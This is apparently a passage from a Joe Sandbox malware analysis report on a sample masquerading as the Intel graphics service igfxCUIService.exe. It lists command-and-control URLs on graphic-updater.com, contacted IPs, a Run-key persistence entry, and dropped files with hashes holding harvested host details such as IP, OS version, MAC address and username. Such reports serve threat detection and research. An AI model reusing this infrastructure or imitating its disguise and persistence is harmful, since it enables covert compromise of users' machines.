    Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp

https://google.com/ | false | | high
    Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqC | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp

https://graphic-updater.com/api/reqm64W% | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqmx | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp

https://graphic-updater.com/api/attachtent.com | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp; igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp

https://graphic-updater.com_ | false | Avira URL Cloud: safe | low
    Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqM | false | | unknown
    Source: igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/P | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp; igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqO | false | | unknown
    Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqdll | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/Q | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqT | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/X | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp; igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqW | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqV | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp; igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp

https://graphic-updater.com/api/reqX | false | Avira URL Cloud: safe | unknown
    Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp; igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp

https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8 | false
    Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp
                                        high
                                        https://graphic-updater.comcom5igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 
00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://graphic-updater.comomHigfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://graphic-updater.com/api/reqdlliigfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://graphic-updater.com/api/attachent.comigfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs

                                        Public

IP               Domain                                Country        ASN    ASN Name     Malicious
142.250.181.238  drive.google.com                      United States  15169  GOOGLEUS     false
142.250.185.129  googlehosted.l.googleusercontent.com  United States  15169  GOOGLEUS     false
23.254.131.176   graphic-updater.com                   United States  54290  HOSTWINDSUS  false

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:550959
                                        Start date:11.01.2022
                                        Start time:17:06:26
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 18s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:IGFXCUISERVICE (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:43
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal92.evad.winEXE@43/21@55/4
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HDC Information:
                                        • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                        • Quality average: 66.8%
                                        • Quality standard deviation: 19.6%
                                        HCA Information:
                                        • Successful, ratio: 65%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                        • Execution Graph export aborted for target powershell.exe, PID 3160 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

Time      Type             Description
17:07:27  API Interceptor  7x Sleep call for process: IGFXCUISERVICE.exe modified
17:07:45  API Interceptor  75x Sleep call for process: powershell.exe modified
17:07:57  API Interceptor  124x Sleep call for process: igfxCUIService.exe modified
17:08:30  API Interceptor  3x Sleep call for process: WMIC.exe modified
17:09:04  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService C:\ProgramData\SystemData\igfxCUIService.exe
17:09:12  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService C:\ProgramData\SystemData\igfxCUIService.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\SystemData\igfxCUIService.exe
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):401920
                                        Entropy (8bit):6.560987668019584
                                        Encrypted:false
                                        SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                        MD5:D90D0F4D6DAD402B5D025987030CC87C
                                        SHA1:FAD66BDF5C5DC2C050CBC574832C6995DBA086A0
                                        SHA-256:1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
                                        SHA-512:C2FAEACFD588585633630AD710F443A72C7617C2D5E37DBFE43570E6AC5904E4B81EB682356A48A93BB794EF5E9D8AD0D673966D57798079B4DE62EA61241024
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Metadefender, Detection: 20%, Browse
                                        • Antivirus: ReversingLabs, Detection: 42%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@......................@...N.......N.....N.........................g.....g.R...g.....Rich............................PE..L...b*1a.............................M............@..........................`............@.....................................x............................ ...8.....................................@............................................text.............................. ..`.rdata...?.......@..................@..@.data....!..........................@....rsrc...............................@..@.reloc...8... ...:..................@..B................................................................................................................................................................................................................................................................................................
                                        C:\ProgramData\SystemData\igfxCUIService.exe:Zone.Identifier
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: [ZoneTransfer]....ZoneId=0
                                        C:\ProgramData\SystemData\microsoft_Windows.dll
                                        Process:C:\ProgramData\SystemData\igfxCUIService.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):184
                                        Entropy (8bit):5.819826125590985
                                        Encrypted:false
                                        SSDEEP:3:LwjDqwo0RMYuSQVp9Gr3JlWRYRJKZMUbnAZ1coZqa/ryaRreJquXMUquOU+77Y:sQ0RMY1AQOjZMyAZ1coZqXSAqCVOXg
                                        MD5:754BD9912D528650E1FC25EA78C7DFCE
                                        SHA1:676AB226ED586409D036CC772772BDD868F86CD2
                                        SHA-256:05199B785C99700D96CDE4E5FBDD033ACC79AB42C29C283E86FBEE8B7CB2FA09
                                        SHA-512:564899F4FD9E71F2BF95F71EC744FA0BB63BEC4C74F59FF82E5985C0138FE21399EFD76B2C55DF215E65C87FA23B20E5FA021C99CCDD78BEF7BD0F6E3FFA684C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: EkUSaowoJc4CawFMNAUu37bQ4MtbTzhqKyuau06YGsWVXynPHsUscThvNzzlmT5r1s8qnB8kuut+C/TziZmT/IeK1y8eGfypKdG1rg9nFWfHPXXias/jX5NW66Z/89zXz5XSf4REo6CLPLWYLvwWy50nri1OKMvrfM8bIdoZ4KX3bOR8l26JxA==
                                        C:\ProgramData\SystemData\tempi1.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):194
                                        Entropy (8bit):2.8825288764544323
                                        Encrypted:false
                                        SSDEEP:3:QsvlkVXuiiFXoslUMLl8JLl1LR9AnV38nl3ZFlR4TTAmvn:QsGV+veEU+8JsnSl3h6wmvn
                                        MD5:496628AF3CBB4554D78D187F73CB59B5
                                        SHA1:AA682421F24FF4A0CE9B0A8F56D6E045575D90FE
                                        SHA-256:6D176DCFB156C12A6309D37F7842FB0478EFD9C147A41AE3B999DDE380B738EB
                                        SHA-512:A9306CB682631C03A82D6327AE6545C51CF5E9877EC0A0CAED031210724D955263284D624B34BD912D9219971EB53C973707D8A21396FEDCC6A9A58DB76CF3C8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..I.P.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{.".1.9.2...1.6.8...2...4.".,. .".f.e.8.0.:.:.7.c.7.0.:.8.3.1.f.:.f.0.5.8.:.6.d.e.3.".}. . .....
                                        C:\ProgramData\SystemData\tempi2.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):96
                                        Entropy (8bit):3.6368782373574886
                                        Encrypted:false
                                        SSDEEP:3:jhzW/F/fKJbRHYn4cFNrYy:NGNUbOVYy
                                        MD5:CC05004BDC260919A7169E1AC1121DBE
                                        SHA1:848DC48B8F256D57D9D1F9A332DF1D66D2C237D1
                                        SHA-256:7FEB02B5EC03FF5D7C68E75DAC0625284EC78A90488CE3DA2CCFD4F5EA79B51B
                                        SHA-512:9D0E82A92CFD64D46372B80C055FEBAB1776AB9423942588402ECEA543EFE146ECA8D8F3C5B7C5447BAEF6AF3D13EA34E6666DB1C07E69582A1559E9EEDCBFF9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: IPAddress ..{"192.168.2.4", "fe80::7c70:831f:f058:6de3"} ..
                                        C:\ProgramData\SystemData\tempo1.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):198
                                        Entropy (8bit):3.452949490699049
                                        Encrypted:false
                                        SSDEEP:3:QjeolVylRflyWdl+SliFlUdf1lAUpvLmolSNcXiUC+lpDekRyl9zLmUlzlzlUi/O:QT5Wn+Sk8dfI4j42veVvzfra8O
                                        MD5:A9575486EB252950DCE017DC76B6678E
                                        SHA1:675037DD1C39AC56D2DC5E7222241EC744DCA294
                                        SHA-256:96F80E4929FB5B75380194BE967EAF68A0E07C2D53DC11E4C60E6723E6DD8663
                                        SHA-512:170E4E99B422A17678FEA47DCEE2F7A0F5C552442B73ADED342D3A4027193CF6CB6288B5DCEFB3DE2AC85B798171CE116B09961A3F2C0AFD1F0B02D43551A9FE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..........C.a.p.t.i.o.n.=.M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .1.0. .P.r.o.....C.S.D.V.e.r.s.i.o.n.=.....O.S.A.r.c.h.i.t.e.c.t.u.r.e.=.6.4.-.b.i.t.....V.e.r.s.i.o.n.=.1.0...0...1.7.1.3.4.............
                                        C:\ProgramData\SystemData\tempo2.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):98
                                        Entropy (8bit):4.791372630910509
                                        Encrypted:false
                                        SSDEEP:3:rmE72AujyM1K8v8WQoeGe2Q+RIwyxLsUhhUrn:yNZj1hbegBifUrn
                                        MD5:A734F3E910730F568B1AD916BD926073
                                        SHA1:8AC9F7A00C609F0E3CBF966CB2D066F0B80F3F84
                                        SHA-256:5EC5698BEE2B8AFDC6FFF935451D9974BAAAF9D5E06BCDCB556A6C3929B6DA94
                                        SHA-512:0E4287659A02950913E5863FB31C70E959FAD03AD9D5E60CE3A7E405A808167696D6443FA4D240346466CD273C48A3256444924CE2EA3EE627636C33ABFA89C3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ....Caption=Microsoft Windows 10 Pro..CSDVersion=..OSArchitecture=64-bit..Version=10.0.17134......
                                        C:\ProgramData\SystemData\temps1.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):3.739356744046493
                                        Encrypted:false
                                        SSDEEP:3:mSGg0W/FLyzdAFFFFmQmeJIMLnQQqQiwxgCrHkuFs:Cg0G5ym/mQrlriwx/r5Fs
                                        MD5:2FCCE3E99FCA78AD8720C5AE2CE22338
                                        SHA1:3EAF399C91849D5372608F8971FB9487199109AB
                                        SHA-256:508F0B0C3CC7AC6E6CFDEFE7DA7CCBD2BE1A5E12C9E77D8FA97EF45FDF60A5C1
                                        SHA-512:782BCF1E171F8788C603CC5BEE7296D23DD2D2D617986560ACF660F725EC00C014079BE38597FA6AE5783208D413CFE9A9DD8D1177898021E3F13219A764D1AB
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{BB556C50-98D0-4585-A1ED-B2838757AE1B} ..
                                        C:\ProgramData\SystemData\temps2.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):58
                                        Entropy (8bit):2.4233824111921316
                                        Encrypted:false
                                        SSDEEP:3:qX/zr:8
                                        MD5:4F3224A5B5F95FCBF9658ED91611F06E
                                        SHA1:E69D36D0B84DE026DC33D99B754941F2DD3E4E58
                                        SHA-256:CC21821ECE1FE5C09F4C0420F56336E3A2AAC0FA6C7D951CBC4CC5B9193E3A3F
                                        SHA-512:B8AE900A3DDDACCD4476997772093E365F9C8B42CB97A5D41D6F85B31C5AB8BDB237E8DAB7FB8AECBD38D23C96D0A7C1577CF1686C1BA032747166D8BAFFBEB3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: SerialNumber .... .... ........
                                        C:\ProgramData\SystemData\tempu.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7
                                        Entropy (8bit):2.8073549220576046
                                        Encrypted:false
                                        SSDEEP:3:5n:5n
                                        MD5:478CC28C2191726D4ACF5AFE62FC0084
                                        SHA1:9B5D186B5B17501F81CD9AF1FE95752D9EB38689
                                        SHA-256:6CC86E4809193273E28FB7C7809F7065DD2BC33075E2DAC32953A75C20B67FEB
                                        SHA-512:DED4DC14E8D1B9C0BC29217F5E5A4EC05984CC1A3DB99CE6D602BF49FC543F0BD52E648D2C7DDE6AAAB3039A7638BFBB0DA039022FF40BD7D3DEFA988620B35D
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: user..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5829
                                        Entropy (8bit):4.902247628650607
                                        Encrypted:false
                                        SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                        MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                        SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                        SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                        SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16500
                                        Entropy (8bit):5.545935071586312
                                        Encrypted:false
                                        SSDEEP:384:bt9MUq05qzYpZzH0wbv+puOMSBKnn3ljulmWTb8aepgvGmdnie9B:LJdsM4Kn1Clhsa+73gB
                                        MD5:7F96CE883A266E60A8E5D60C92C0DE5B
                                        SHA1:C53F6FEFE538E72FC1D57C9DEBE12A351560C174
                                        SHA-256:11C65A1A25FF9982A6A801DD365B9D288C0BBD89E6A2B8EA913D6BC1AF4E2DCB
                                        SHA-512:C2E6A34B67EE338FB6A617823A248F5327450215995A83CF8F3FEF68EFE9D9CB3B1FFACA2957B102EEDB6F61E82D9C645BDEBA5295F468209FEAE0848DED3233
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: @...e...........................i.....8.$.......................H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cfw3gdv.gvv.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bil51lnr.xyu.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btj2vhwe.osx.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvbtqswx.dh0.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijgefb2u.3np.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
